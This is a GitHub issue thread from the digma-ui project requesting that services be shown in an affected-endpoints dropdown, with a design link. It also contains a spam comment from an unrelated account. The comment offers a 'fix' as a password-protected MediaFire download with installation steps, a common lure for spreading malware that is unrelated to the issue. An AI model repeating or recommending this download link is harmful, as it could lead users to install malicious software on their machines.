### ISSUE TITLE
Show services in the affected endpoints dropdwon

### ISSUE THREAD

**Issue by doppleware** [digma-ai/digma-ui#1002]
Make sure we are backwards compatible.
If we don't have the endpoint service, please open a BE ticket 

https://www.figma.com/design/MxA95ZHK5NqGX4ptFQljRJ/%E2%AD%90-Design-System-3.0?node-id=12298-163476&t=91FeRHg7LRuTQxiM-11

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
